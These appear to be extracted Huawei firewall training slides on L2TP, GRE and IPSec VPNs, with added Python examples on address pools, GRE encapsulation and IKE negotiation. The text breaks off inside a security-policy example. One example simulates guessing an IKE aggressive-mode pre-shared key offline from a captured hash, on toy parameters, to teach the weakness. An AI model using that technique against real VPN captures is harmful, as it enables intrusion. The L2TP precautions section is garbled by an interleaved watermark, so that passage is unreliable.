[LAC] firewall packet-filter default permit interzone trust local
[LAC] firewall packet-filter default permit interzone untrust local
Typical Configurations of L2TP VPN: LNS (1)

Create a virtual interface template.
[LN] interface Virtual-Template 1
Configure the IP address of the virtual interface template.
[LNS-Virtual-Template1] ip address 10.1.1.1 24
Configure the PPP authentication mode.
[LNS-Virtual-Template1] ppp authentication-mode chap
Allocate an IP address from the address pool to the peer interface.
[LNS-Virtual-Template1] remote address pool 1
Typical Configurations of L2TP VPN: LNS (2)

Add the virtual interface template to the security zone.
[LNS-zone-trust] add interface Virtual-Template 1
Enable L2TP.
[LNS] l2tp enable
Configure an L2TP group.
[LNS] l2tp-group 1
Specify the name and Virtual-Template of the tunnel peer when receiving a call.
[LNS-l2tp1] allow l2tp virtual-template 1
Start L2TP tunnel authentication.
[LNS-l2tp1] tunnel authentication
Configure an L2TP tunnel authentication password.
[LNS-l2tp1] tunnel password simple hello
Typical Configurations of L2TP VPN: LNS (3)

Configure the name of the local end of the tunnel.
[LNS-l2tp1] tunnel name lns
Enter the AAA view.
[LNS] aaa
Create the user name and password of the local user.
[LNS-aaa] local-user pc1 password simple pc1pc1
Configure the user type.
[LNS-aaa] local-user pc1 service-type ppp
Configure a public IP address pool.
[LNS-aaa] ip pool 1 4.1.1.1 4.1.1.99
Configure default interzone packet filtering rules.
[LNS] firewall packet-filter default permit interzone local untrust
L2TP VPN Configuration (Web)

Typical Configurations of L2TP VPN: Verification and Maintenance

Display information about the current L2TP tunnel.
<LAC> display l2tp tunnel
Total tunnels = 1
LocalTID RemoteTID Remote Address Port Sessions Remote Name
1 1 3.3.2.1 1701 lns

Display information about the current L2TP session.
<LAC> display l2tp session
Total session = 1
LocalSID RemoteSID LocalTID
1 8 1
Precautions on L2TP VPN Configuration
.
i
e
w
a
u
The LNS must be configured with the IP address of theh
.
virtual template. This template must be added to a g
zone.
n
i
n
r
a
By default, the firewall needs to carry out e
tunnel
l
authentication. If tunnel authentication/is not configured,
/
run the undo tunnel authentication :
command.
p
t
ht dial-up user and the
The address allocated to the L2TP
: user must be on different
address of the internal network
s
e the dial-up user of L2TP can
network segments so that
c
r address.
access internal network
u
o
s
e
R
The USG5000 cannot be configured as the LAC.
g
n
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 35
Copyrig
o

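The third precaution is easy to break when an address pool is edited later. The following check is added here as an example and is not part of the Huawei training material: it reads the pool from LNS configuration lines modelled on the ones above (ip pool 1 4.1.1.1 4.1.1.99) and reports every internal segment that the pool overlaps. The internal segments 10.1.1.0/24 and 4.1.1.64/26 are constructed inputs used only to exercise the check.

```python
import ipaddress
import re

# Constructed LNS configuration, modelled on the "ip pool" line shown above.
LNS_CONFIG = """
 ip pool 1 4.1.1.1 4.1.1.99
"""

POOL_RE = re.compile(r"^\s*ip pool (\d+) (\S+) (\S+)\s*$", re.MULTILINE)


def parse_pools(config):
    """Return {pool_id: (first_addr, last_addr)} from 'ip pool' lines."""
    return {
        int(m.group(1)): (ipaddress.ip_address(m.group(2)),
                          ipaddress.ip_address(m.group(3)))
        for m in POOL_RE.finditer(config)
    }


def pool_conflicts(first, last, internal_subnets):
    """Return the internal subnets that share addresses with the pool.

    The pool range is expanded to the minimal set of CIDR blocks that
    cover first..last, so the comparison is exact whatever the alignment.
    """
    blocks = list(ipaddress.summarize_address_range(first, last))
    conflicts = []
    for subnet in internal_subnets:
        net = ipaddress.ip_network(subnet, strict=False)
        if any(net.overlaps(block) for block in blocks):
            conflicts.append(str(net))
    return conflicts


def check_lns(config, internal_subnets):
    """Map each pool id in the config to the internal subnets it collides with."""
    return {pid: pool_conflicts(first, last, internal_subnets)
            for pid, (first, last) in parse_pools(config).items()}


if __name__ == "__main__":
    # Assumed internal segments: one clean, one deliberately overlapping.
    internal = ["10.1.1.0/24", "4.1.1.64/26"]
    for pid, bad in check_lns(LNS_CONFIG, internal).items():
        state = "OK" if not bad else "CONFLICT with " + ", ".join(bad)
        print("ip pool %d: %s" % (pid, state))
```

Run it against the real configuration by replacing LNS_CONFIG with the output of display current-configuration and listing the segments behind the LNS; a non-empty list for a pool means dial-up users will be assigned addresses that collide with internal hosts.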
Summary

Application scenarios of VPDN
Basic concepts of L2TP
Application scenarios of VPDN in Client-Initialized and NAS-Initialized modes
Configuration methods of L2TP
Questions

What are the two trigger conditions for the LAC to establish an L2TP tunnel connection? What are the differences between them?
What information does the LNS use to identify L2TP packets?
What are the differences between the LAC/client and the LNS/server in data packets?
In what situation should tunnel authentication be disabled for Client-Initialized L2TP?
Why do an LAC virtual interface template and its corresponding physical interface Ethernet 0/0/0 not need to be configured with IP addresses?
What is the application scenario of L2TP group number 1 (the default group)? What are the differences between this group number and other group numbers?
What is the relationship between the DHCP IP address and the domain?
To ensure that remote dial-up users can access resources of the private network, how do you configure interzone packet filtering on the LNS, and what is the relationship between the virtual interface template and the security zone?
For L2TP, how do you configure interzone packet filtering to meet the requirement for minimum rights?
What security services can the L2TP VPN provide? What are the restrictions?

Answer

(No content on this slide.)
Thank you
www.huawei.com
Chapter 8 GRE VPN
Objectives

Upon completion of this course, you will be able to describe:
Basic principles and implementation modes of Generic Routing Encapsulation (GRE) VPN
Security mechanisms of GRE VPN
Application scenarios and configuration methods of GRE VPN
Contents

1. GRE VPN Overview
2. GRE VPN Technology
3. Analyzing the Application Scenarios of GRE VPN
GRE Overview

(Figure: a GRE tunnel across the Internet between Firewall A and Firewall B connects an IPX network with the IPX network at the HQ. The encapsulation stack shown is: link layer | IP | GRE | IPX | payload.)

GRE encapsulates data packets of certain network-layer protocols, such as IP, IPX and AppleTalk, so that the encapsulated packets can be transmitted over another network-layer protocol, for example IP.

GRE provides a mechanism by which a packet of one protocol can be encapsulated in a packet of another protocol, so that packets can be transmitted over various types of networks. The path along which the encapsulated packets travel is referred to as a tunnel.
Applications of GRE

(Figure: the three protocol roles in GRE encapsulation.)

Passenger protocol: IP or IPX, the protocol being carried.
Encapsulation protocol: GRE.
Transport protocol: IP, the protocol that carries the GRE packet across the network, running over a link-layer protocol.
GRE Features

Simple mechanism, easy to configure and maintain.
Does not provide data encryption; it can be used together with IPSec when confidentiality is required.
Does not provide flow control or QoS.
(Section 2: GRE VPN Technology)
GRE Implementation: Tunnel Interface

(Figure: a tunnel interface is defined by its source address, destination address, encapsulation type and tunnel interface IP address.)

A tunnel interface is a point-to-point virtual interface that is provided to encapsulate packets. It is a logical interface, similar to a loopback interface.
GRE Implementation: Encapsulation and Decapsulation

(Figure: FW A and FW B connected by a GRE tunnel; the original packet is routed with next hop "tunnel", and the outer IP header carries protocol field 47.)

Encapsulation process:
The original data packet is routed; after it enters the tunnel interface, the packet is encapsulated (a GRE header and a new IP header with protocol number 47 are added).
The encapsulated data packet is forwarded to the IP module for further processing.

Decapsulation process:
When the destination address of the packet is the IP address of the local device and the protocol field is 47, decapsulation starts.
The decapsulated data packet is forwarded to the IP module for further processing.
Format of a GRE Packet Header

(Figure: the GRE header layout of RFC 1701/2784: C and K flag bits, Recursion, Flags, Version, Protocol Type, and the optional Checksum and Key fields.)

C: Checksum Present bit. 1: the checksum field is present. 0: the checksum field is absent.
K: Key Present bit. 1: the key field is present in the GRE header. 0: the key field is absent.
Recursion: the number of additional encapsulations that are permitted.
Flags: reserved bits. They must be set to 0.
Version: must be set to 0. The value 1 is used by PPTP (RFC 2637).
Protocol Type: the type of the passenger protocol.
Checksum: the IP (one's complement) checksum computed over the GRE header and the payload packet; present when C is 1.
Key: the key field carried in the GRE header when K is 1; the receiver uses it to identify which tunnel a packet belongs to.
GRE Security Mechanism

Check and verification (checksum):
When bit C is 1, the checksum is valid.
The sender calculates the checksum; the receiver verifies the checksum.

Keyword identification (key):
If bit K is 1, the key field is present in the GRE header.
Only when the keyword is consistent at both ends does the check succeed.

Neither mechanism is cryptographic. The checksum only detects accidental corruption, and the key is sent in clear text in every packet, so anyone who can observe the tunnel can learn it and inject or modify packets. These mechanisms protect against misconfiguration and mis-delivery, not against an attacker; for confidentiality and integrity, run GRE over IPSec, as the GRE Features slide notes.
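The encapsulation and decapsulation steps and both security mechanisms above are shown end to end in the following example. It is added here as an illustration and is not code from the Huawei training material or from the USG product: it builds a GRE packet (RFC 2784 header with the RFC 2890 key extension) inside an outer IPv4 header with protocol number 47, then decapsulates it only if the packet is addressed to the local device, the checksum verifies and the key matches. The tunnel endpoints 192.13.2.1 and 131.108.5.2 are taken from the scenario later in this chapter; the inner addresses, the key value and the "ping" payload are constructed for the example.

```python
import socket
import struct

GRE_PROTO = 47            # IP protocol number of GRE (outer header)
ETHERTYPE_IPV4 = 0x0800   # GRE Protocol Type for an IPv4 passenger
FLAG_C = 0x8000           # Checksum Present bit
FLAG_K = 0x2000           # Key Present bit


def ones_complement_sum(data):
    """RFC 1071 checksum over data (an odd length is padded with a zero byte)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_gre(payload, proto_type=ETHERTYPE_IPV4, key=None, checksum=False):
    """GRE header: flags/version, protocol type, [checksum + reserved1], [key]."""
    flags = (FLAG_C if checksum else 0) | (FLAG_K if key is not None else 0)
    header = struct.pack("!HH", flags, proto_type)
    if checksum:
        header += struct.pack("!HH", 0, 0)        # checksum placeholder, Reserved1
    if key is not None:
        header += struct.pack("!I", key)
    if checksum:                                  # covers header and payload
        csum = ones_complement_sum(header + payload)
        header = header[:4] + struct.pack("!H", csum) + header[6:]
    return header + payload


def parse_gre(data, expected_key=None):
    """Return (proto_type, payload), or None if version, checksum or key fail."""
    flags, proto_type = struct.unpack("!HH", data[:4])
    if flags & 0x0007:                            # version must be 0
        return None
    offset = 4
    if flags & FLAG_C:
        # Summing everything including the checksum field must give zero.
        if ones_complement_sum(data) != 0:
            return None
        offset += 4
    key = None
    if flags & FLAG_K:
        key = struct.unpack("!I", data[offset:offset + 4])[0]
        offset += 4
    if key != expected_key:                       # both ends must use the same key
        return None
    return proto_type, data[offset:]


def build_ipv4(src, dst, proto, payload, ttl=64):
    """Minimal 20-byte IPv4 header (no options) with a correct header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, ttl,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    csum = ones_complement_sum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload


def parse_ipv4(packet):
    """Return (src, dst, proto, payload) for an IPv4 packet."""
    ihl = (packet[0] & 0x0F) * 4
    return (socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20]),
            packet[9], packet[ihl:])


def gre_encapsulate(inner_ip_packet, tunnel_src, tunnel_dst, key=None):
    """What the tunnel interface does: add GRE, then an outer IP header with protocol 47."""
    gre = build_gre(inner_ip_packet, ETHERTYPE_IPV4, key=key, checksum=True)
    return build_ipv4(tunnel_src, tunnel_dst, GRE_PROTO, gre)


def gre_decapsulate(packet, local_addr, expected_key=None):
    """Decapsulate only if the packet is for us and carries protocol 47; else None."""
    src, dst, proto, payload = parse_ipv4(packet)
    if dst != local_addr or proto != GRE_PROTO:
        return None
    parsed = parse_gre(payload, expected_key)
    if parsed is None or parsed[0] != ETHERTYPE_IPV4:
        return None
    return parsed[1]


if __name__ == "__main__":
    # Constructed inner packet: an ICMP (protocol 1) datagram between the two subnets.
    inner = build_ipv4("10.1.1.5", "10.1.3.7", 1, b"ping")
    outer = gre_encapsulate(inner, "192.13.2.1", "131.108.5.2", key=1234)
    print("outer protocol:", parse_ipv4(outer)[2])
    print("decap with right key:", gre_decapsulate(outer, "131.108.5.2", 1234) == inner)
    print("decap with wrong key:", gre_decapsulate(outer, "131.108.5.2", 999))
```

The receiver checks the destination address and protocol first (the condition on the decapsulation slide), then the checksum, then the key; a mismatch in any of them drops the packet silently, which is exactly what a wrong gre key on one end looks like in practice: the tunnel interface is up, but nothing arrives.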
(Section 3: Analyzing the Application Scenarios of GRE VPN)
Typical Application Scenario of GRE VPN

(Figure: Firewall A and Firewall B are connected across the Internet by a GRE tunnel. Firewall A: E0/0/0 10.1.1.1/24 towards subnet 1, E1/0/0 192.13.2.1/24 towards the Internet. Firewall B: E2/0/0 131.108.5.2/24 towards the Internet, E0/0/0 10.1.3.1/24 towards subnet 2 at the HQ.)

Subnets 1 and 2 are interconnected through a Layer 3 tunnel protocol between firewalls A and B.
Configuration Roadmap of GRE VPN

(Flow chart)
Start
1. Perform basic configuration (including interface IP addresses).
2. Configure a tunnel logical interface and specify the source address and destination address used by the GRE tunnel.
3. Configure a route to the segment on the peer network; the next hop is the tunnel interface.
4. Enable interzone rules.
End
Configuration Method of GRE VPN

Run the interface tunnel number command to create a virtual tunnel interface and enter the interface view.
(Optional) Run the tunnel-protocol gre command to configure the encapsulation mode of packets on the tunnel interface.
Run the source { ip-address | interface-type interface-number } command to configure the source address of the tunnel interface.
Run the destination ip-address command to configure the destination address of the tunnel interface.
The source and destination addresses identify a tunnel. The addresses configured at the two ends mirror each other: the source of one end is the destination of the other.
(Optional) Run the ip address ip-address { mask | mask-length } command to configure the network address of the tunnel interface.
(Optional) Run the gre checksum command to enable end-to-end checksum verification for both ends of the tunnel.
(Optional) Run the gre key key-number command to configure the identification key of the tunnel interface. The key must be the same at both ends.
Typical Configuration of GRE VPN (1)

Configure firewall A.

1. Perform basic configuration (omitted).
2. Create interface Tunnel 1.
[A] interface tunnel 1
3. Configure the IP address of interface Tunnel 1.
[A-Tunnel1] ip address 10.1.1.1 24
4. Configure the tunnel encapsulation mode.
[A-Tunnel1] tunnel-protocol gre
5. Configure the source address of interface Tunnel 1 (IP address of Ethernet 1/0/0 on firewall A).
[A-Tunnel1] source 192.13.2.1
6. Configure the destination address of interface Tunnel 1 (IP address of Ethernet 2/0/0 on firewall B).
[A-Tunnel1] destination 131.108.5.2
Typical Configuration of GRE VPN (2)

7. Configure a static route to subnet 2 (10.1.3.0/24) with Tunnel 1 as the outbound interface.
[A] ip route-static 10.1.3.0 255.255.255.0 tunnel 1
8. Enter the Untrust zone view.
[A] firewall zone untrust
9. Add Tunnel 1 to the Untrust zone.
[A-zone-Untrust] add interface Tunnel 1
10. Configure default interzone packet filtering rules.
[A] firewall packet-filter default permit interzone trust local
[A] firewall packet-filter default permit interzone untrust local
[A] firewall packet-filter default permit interzone trust untrust

(These default rules open all traffic between the zones named. The Untrust-to-Local rule is needed only for GRE (IP protocol 47) from the peer 131.108.5.2, and the Trust-Untrust rule only for traffic between the two subnets; restricting the rules to that is the "minimum authorization" asked about in the questions at the end of this chapter.)
Typical Configuration of GRE VPN (3)

The configuration of firewall B mirrors that of firewall A. Only the source and destination addresses of the tunnel and the static route need to be changed.

1. Configure the IP address of interface Tunnel 1.
[B-Tunnel1] ip address 10.1.3.1 24
2. Configure the source address of interface Tunnel 1 (IP address of Ethernet 2/0/0 on firewall B).
[B-Tunnel1] source 131.108.5.2
3. Configure the destination address of interface Tunnel 1 (IP address of Ethernet 1/0/0 on firewall A).
[B-Tunnel1] destination 192.13.2.1
4. Configure a static route to subnet 1 (10.1.1.0/24) with Tunnel 1 as the outbound interface.
[B] ip route-static 10.1.1.0 255.255.255.0 tunnel 1
Configuration of GRE VPN (Web)

(This slide is a screenshot of the web configuration page; the image is not reproduced here.)
Precautions on the Configuration of GRE VPN

To ensure smooth forwarding of data flows, add the physical interface and the tunnel interface created on it to the same security zone.

The devices at the two ends of a tunnel can forward GRE-encapsulated packets only when both devices have routes that send the traffic into the tunnel.

If key verification is configured on a tunnel, the verification succeeds only when the keys at both ends are the same. Otherwise, the packet is dropped.

If checksum is configured, the sender computes the checksum over the GRE header and the payload and sends the packet containing the checksum to the peer; the peer verifies it and drops packets whose checksum does not match.
Summary

Basic principles and implementation modes of Generic Routing Encapsulation (GRE) VPN
Security mechanisms of GRE VPN
Application scenarios and configuration methods of GRE VPN
Questions

What are the main application scenarios of GRE VPN? What are the drawbacks of GRE VPN?
What security services can GRE VPN provide?
Which interfaces do the source and destination IP addresses of GRE represent in a real application scenario?
What mechanism does the GRE source end use to trigger the setup of a tunnel?
What information does the GRE destination end use to identify received GRE packets?
In a GRE application scenario, how do you set interzone filtering to meet the principle of minimum authorization?

Answer

(No content on this slide.)
Thank you
www.huawei.com
Chapter 9 IPSec VPN
Objectives

Upon completion of this course, you will be able to describe:
Basic principles of IPSec
AH and ESP technologies
Service flow of the IKE protocol
Application scenarios and configurations of IPSec VPN
Contents

1. IPSec VPN Overview
2. IPSec VPN Architecture
3. AH Technology
4. ESP Technology
5. IKE Technology
6. IPSec VPN Application Scenarios
IPSec Overview

(Figure: an IPSec VPN security tunnel across the Internet between a branch and the H.Q.; the security services shown are confidentiality, integrity, authentication and anti-replay.)
IPSec Features

(Figure: the protocol stacks of a branch host and an HQ host, APP data / TCP/UDP / IP. The protection area of the IPSec VPN starts at the IP layer, so everything above it, all applications and Internet services, is protected transparently.)
IPSec Protection Scenario

(Figure: a branch and the H.Q. connected by an IPSec VPN, plus an IPSec end-to-end (E2E) scenario.)

IPSec can be applied:
Between security gateways (such as firewalls)
Between a host and a security gateway
Between hosts (end to end)
(Section 2: IPSec VPN Architecture)
IPSec VPN Architecture

(Figure: the IPSec VPN architecture consists of the security protocols AH (authentication header) and ESP (encapsulating security payload), the encryption algorithms, the authentication algorithms, key management, and policy.)
IPSec Protocols

AH: AH provides the functions of authenticating the data source, checking data integrity and anti-replay, but AH does not encrypt the protected packets.

ESP: ESP provides all the functions of AH and also encrypts the IP packets. However, the data integrity of the outer IP header is not checked: the ESP integrity check covers only the ESP header, the payload and the ESP trailer.

IPSec provides privacy, integrity, authenticity and anti-replay of packets during network transmission.
IPSec Encapsulation Modes

Transport mode: IPSec headers are inserted after the IP header and before all transport-layer protocols or any other IPSec protocols.

Tunnel mode: IPSec headers are inserted before the original IP header, and a new IP header is placed before AH or ESP.

(Figure)
Original packet:  IPH | Data
Transport mode:   IPH | IPSec | Data
Tunnel mode:      New IPH | IPSec | Org IPH | Data
Comparison Between IPSec Encapsulation Modes

Transport mode:  Original IP header | IPSec header | IP data
Tunnel mode:     New IP header | IPSec header | Original IP header | Original IP data

Comparison:
1. Security: in tunnel mode, the original IP header is hidden, so the addresses of the real endpoints are not exposed on the public network.
2. Performance: tunnel mode adds one extra IP header, so it uses more bandwidth than transport mode.

To select an encapsulation mode, weigh performance against security. Between security gateways (the scenario in this chapter) tunnel mode is the normal choice, because the gateway is not the endpoint of the protected traffic and must carry the original IP header inside the tunnel.
Encryption and Authentication Algorithms

Encryption algorithms:
DES (56-bit key, 64-bit block)
3DES (3 x 56-bit keys, 64-bit block)
AES (128-, 192- or 256-bit key)
China encryption algorithm (256-bit)

Authentication algorithms:
MD5 (128-bit digest)
SHA-1 (160-bit digest)

Computational complexity is not necessarily related to encryption strength.

DES, with its 56-bit key, and MD5 are no longer considered adequate; prefer AES and a SHA-based authentication algorithm wherever both peers support them.
(Section 3: AH Technology)
IPSec Protocol: AH

Provides data source authentication (authenticity), integrity check, and anti-replay.
Encryption algorithms are not supported.

AH header format:
Next header | Payload length | Reserved field
Security parameter index (SPI)
Sequence number (SN)
Authentication data (variable length)
followed by the payload data.
AH Packet Encapsulation Modes

Transport mode:  IPH | AH | Data
Authenticates all the unchanging parts of the packet: the entire IP packet except the mutable fields of the IP header.

Tunnel mode:  New IPH | AH | Org IPH | Data
Authenticates the new IP header (except its mutable fields) together with the entire original IP packet.

In the IP packet header, the AH protocol number is 51.
(Section 4: ESP Technology)
IPSec Protocol: ESP

Provides data authenticity, data integrity, anti-replay, and data confidentiality.
Supports encryption algorithms.

ESP packet format:
Security parameter index (SPI)
Sequence number (SN)
Initialization vector
Payload data
Padding | Pad length | Next header (the ESP trailer)
Authentication data
ESP Packet Encapsulation Modes

Transport mode:  IPH | ESPH | Data | ESP Trailer | ESP Auth
Tunnel mode:     New IPH | ESPH | Org IPH | Data | ESP Trailer | ESP Auth

Encryption part: from the payload data (in tunnel mode, from the original IP header) through the ESP trailer.
Authentication part: from the ESP header through the ESP trailer; the outer IP header and the ESP Auth field itself are not covered.

The protocol number of ESP in the IP packet header is 50.

Transport mode: the ESP header is located between the IP header and the transport-layer header. The ESP trailer is appended after the data.
Tunnel mode: the ESP header is located between the new IP header and the original IP packet. The ESP trailer is appended after the data.
(Section 5: IKE Technology)
IKE Overview

IKE (Internet Key Exchange) combines three protocols:

Oakley: a free-form key exchange protocol built on the Diffie-Hellman algorithm.
SKEME: defines how the key exchange is verified (authenticated).
ISAKMP: defines the state-transition process of the communication modes and the message formats that guarantee communication security.
IKE Security Mechanism

DH algorithm for key distribution
Perfect forward secrecy
Identity authentication
Identity protection

IKE has a self-protection mechanism: it can safely distribute keys, authenticate identities, and set up an IPSec security association over an insecure network.
IPSec SA Concept

An SA (security association) is the agreement between communication peers on a set of elements. An SA can be established only when both communicating parties comply with the SA conventions.

SA contents:
Security protocol (AH, ESP, or AH+ESP)
Operation mode (transport mode or tunnel mode)
Encryption algorithm (DES, 3DES, ...)
Lifecycle of the shared key, and the key itself

An SA is uniquely identified by a triplet: the SPI, the destination IP address, and the security protocol number. An SA is unidirectional, so a two-way IPSec connection needs one SA per direction.
IKE Functions in IPSec

Reduces the complexity of manual configuration.
Scheduled SA update.
Scheduled key update.
Allows IPSec to provide the anti-replay service.
Allows end-to-end dynamic authentication.
Relation Between IKE and IPSec

(Figure: on each peer, IKE runs over UDP (port 500) and negotiates the SA; the SA is handed down to IPSec at the IP layer, which produces the encrypted IP packets exchanged between the two peers.)
IKE Phases

(Figure: receive the data streams to be protected; negotiate the IKE SA; negotiate the IPSec SA; provide AH and ESP protection.)

IKE uses two phases to negotiate IPSec keys and establish an SA:

First phase: both communicating parties establish an authenticated and protected tunnel, namely the IKE SA. The negotiation modes are main mode and aggressive mode. The authentication methods are pre-shared key, digital signature, and public key encryption.

Second phase: the tunnel established in the first phase is used to negotiate the security services for IPSec and to set up the IPSec SA. The IPSec SA is used for the final secure transmission of IP data. The negotiation mode is quick mode (called "fast mode" in this material).
Exchange Process of IKE Pre-Shared Key in Main Mode

(Figure: the six messages between the initiator and the responder, in three pairs.)

Messages 1 and 2 (mode negotiation, algorithm confirmation): the initiator sends its cookie and the proposed SA; the responder answers with its cookie and the accepted algorithms.
Messages 3 and 4 (DH exchange, nonce exchange): key exchange payload Xa and nonce payload Ni from the initiator; key exchange payload Xb and nonce payload Nr from the responder. Both sides then generate the keys.
Messages 5 and 6 (identity authentication): each side sends its identity together with a hash payload derived from the keys; the peer verifies the hash.
End
Negotiation Process of Pre-Shared Key in IKE Aggressive Mode

(Figure: three messages between Peer 1 (initiator) and Peer 2 (responder).)

In aggressive mode, three messages in total are exchanged.
Message 1 carries the SA payload, the key exchange material and nonce, and the identity of the initiator.
Message 2 carries the same payloads from the responder plus the hash payload that authenticates the responder.
Message 3 carries the initiator's hash payload, with which the responder authenticates the initiator.
Difference Between Main Mode and Aggressive Mode of IKE

Exchanged messages:
Main mode: 6; aggressive mode: 3.

Identity protection:
In main mode, the last two messages are encrypted, so the identities are protected. In aggressive mode, the messages are highly integrated and the identities are sent in the clear, so there is no identity protection.

Peer identifier:
In main mode, peers are identified by IP address only. In aggressive mode, peers can be identified by IP address or by name.

With pre-shared keys, the responder in main mode has to select the key from the initiator's IP address before it has seen the initiator's identity, which is why name-based identification (for example, for a peer with a dynamic address) requires aggressive mode. The price is that the aggressive-mode hash is sent before encryption starts, so a low-entropy pre-shared key can be guessed offline by anyone who captures the exchange.
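The example below, added here and not part of the Huawei training material, simulates IKEv1 phase 1 with pre-shared key authentication in both modes, using the RFC 2409 derivations (SKEYID = prf(PSK, Ni | Nr), HASH_I and HASH_R over the DH values, cookies, SA body and identity). It records what an on-path observer sees in each message and then tries to recover the pre-shared key from that capture, which succeeds only for aggressive mode. The Diffie-Hellman parameters are a toy group chosen so the block runs instantly, not an IKE group, and the SA body and identities are constructed.

```python
import hashlib
import hmac
import os

# Toy Diffie-Hellman parameters (a 127-bit Mersenne prime); NOT an IKE DH group.
P = (1 << 127) - 1
G = 5
# Constructed bytes standing in for the SA payload body (SAi_b in RFC 2409).
SA_BODY = b"ENCR=3des-cbc;HASH=sha1;AUTH=pre-share;GROUP=toy"


def prf(key, data):
    """IKEv1 prf: HMAC with the negotiated hash, here SHA-1 (RFC 2409, 3.2)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def dh_keypair():
    x = int.from_bytes(os.urandom(16), "big") % (P - 2) + 1
    return x, pow(G, x, P)


def be(n):
    return n.to_bytes(16, "big")


def skeyid_psk(psk, ni, nr):
    """Pre-shared key authentication: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return prf(psk, ni + nr)


def hash_i(sk, c):
    return prf(sk, be(c["gxi"]) + be(c["gxr"]) + c["cky_i"] + c["cky_r"] + SA_BODY + c["id_i"])


def hash_r(sk, c):
    return prf(sk, be(c["gxr"]) + be(c["gxi"]) + c["cky_r"] + c["cky_i"] + SA_BODY + c["id_r"])


def phase1(mode, psk_i, psk_r, id_i=b"branch.example", id_r=b"hq.example"):
    """Simulate IKEv1 phase 1 with PSK authentication in main or aggressive mode.

    Returns (authenticated, wire, capture): whether both HASH payloads verified,
    the payload names an on-path observer sees per message, and the values that
    observer can actually record (encrypted payloads are never recorded).
    """
    xi, gxi = dh_keypair()
    xr, gxr = dh_keypair()
    ctx = {"cky_i": os.urandom(8), "cky_r": os.urandom(8), "ni": os.urandom(16),
           "nr": os.urandom(16), "gxi": gxi, "gxr": gxr, "id_i": id_i, "id_r": id_r}
    assert pow(gxr, xi, P) == pow(gxi, xr, P)       # both sides agree on g^xy
    sk_i = skeyid_psk(psk_i, ctx["ni"], ctx["nr"])   # initiator's SKEYID
    sk_r = skeyid_psk(psk_r, ctx["ni"], ctx["nr"])   # responder's SKEYID
    h_i, h_r = hash_i(sk_i, ctx), hash_r(sk_r, ctx)
    # Each side recomputes the peer's hash with its own PSK; a mismatch fails.
    authenticated = (hmac.compare_digest(h_i, hash_i(sk_r, ctx)) and
                     hmac.compare_digest(h_r, hash_r(sk_i, ctx)))
    capture = {k: v for k, v in ctx.items() if k not in ("id_i", "id_r")}
    if mode == "main":
        wire = [(1, "I", {"HDR", "SA"}), (2, "R", {"HDR", "SA"}),
                (3, "I", {"HDR", "KE", "Ni"}), (4, "R", {"HDR", "KE", "Nr"}),
                (5, "I", {"HDR", "ENCRYPTED(ID_I, HASH_I)"}),
                (6, "R", {"HDR", "ENCRYPTED(ID_R, HASH_R)"})]
    elif mode == "aggressive":
        wire = [(1, "I", {"HDR", "SA", "KE", "Ni", "ID_I"}),
                (2, "R", {"HDR", "SA", "KE", "Nr", "ID_R", "HASH_R"}),
                (3, "I", {"HDR", "ENCRYPTED(HASH_I)"})]
        capture.update(id_i=id_i, id_r=id_r, hash_r=h_r)  # all sent in the clear
    else:
        raise ValueError("mode must be 'main' or 'aggressive'")
    return authenticated, wire, capture


def identity_exposed(wire):
    """True if an identity payload appears unencrypted in any message."""
    return any(p in ("ID_I", "ID_R") for _, _, payloads in wire for p in payloads)


def offline_psk_guess(capture, candidates):
    """Test candidate PSKs against a captured HASH_R; None if nothing to test."""
    if "hash_r" not in capture:
        return None
    for psk in candidates:
        sk = skeyid_psk(psk, capture["ni"], capture["nr"])
        if hmac.compare_digest(hash_r(sk, capture), capture["hash_r"]):
            return psk
    return None


if __name__ == "__main__":
    for mode in ("main", "aggressive"):
        ok, wire, cap = phase1(mode, b"hello", b"hello")
        print(mode, "authenticated:", ok, "identity exposed:", identity_exposed(wire),
              "PSK recovered:", offline_psk_guess(cap, [b"password", b"hello"]))
```

In main mode the capture never contains an identity or a hash, so there is nothing to test a guess against; in aggressive mode HASH_R in message 2 is a keyed hash of values the observer already holds, so the pre-shared key is only as strong as its entropy.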
Negotiation Process in Quick (Fast) Mode

(Figure: three messages between Peer 1 (initiator) and Peer 2 (responder).)

Quick mode requires exchanging three messages in total.
In messages 1 and 2, the SA, key material, nonce and ID payloads are exchanged, for algorithm negotiation, PFS guarantee (a fresh DH exchange) and proof of liveness.
Message 3 confirms that the responder is live and can communicate; it is equivalent to an acknowledgment.
Key Protection

Key lifecycle: a key has a lifecycle. When the lifecycle expires, a new key replaces the original one.

Perfect forward secrecy (PFS): the keys of different SAs are independent of each other, so the compromise of one key does not reveal the others. In IKE this is achieved by performing a fresh DH exchange in the second phase instead of deriving the IPSec keys from the first-phase secret.

Diffie-Hellman (DH) group: in this public-key scheme, the information needed to generate the shared key is exchanged over a public communication channel (the Internet) without protection; the shared secret itself is never transmitted. The group determines the size of the modulus and therefore the strength of the exchange.
IPSec Flow Processing

(Figure: inbound and outbound flows at the branch and at the H.Q.)

For each packet, inbound or outbound, the security policy decides one of three actions:
Discarding the packet
Bypassing the security service (forwarding in the clear)
Applying the security service (IPSec protection)
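The three actions above, together with the SA triplet and the unidirectional SAs from the IPSec SA Concept slide, can be modelled as a small security policy database (SPD) and SA database (SAD). The following example is added here and is not code from the Huawei training material or from the USG: it builds the policy of USG A in the networking scenario later in this chapter (intranet 192.168.0.0/24 behind public address 202.39.160.1, peer USG B at 202.39.169.1 with intranet 192.168.1.0/24) and processes constructed packets in both directions. The SPI values and the "plain Internet access is bypassed" rule are assumptions for the example.

```python
import ipaddress

DISCARD, BYPASS, PROTECT = "discard", "bypass", "protect"
ESP, AH = 50, 51


class SecurityPolicy:
    """One SPD entry: traffic selectors plus the action, and for protect the SA."""

    def __init__(self, src_net, dst_net, action, sa=None, proto=None):
        self.src = ipaddress.ip_network(src_net)
        self.dst = ipaddress.ip_network(dst_net)
        self.proto, self.action, self.sa = proto, action, sa

    def matches(self, pkt):
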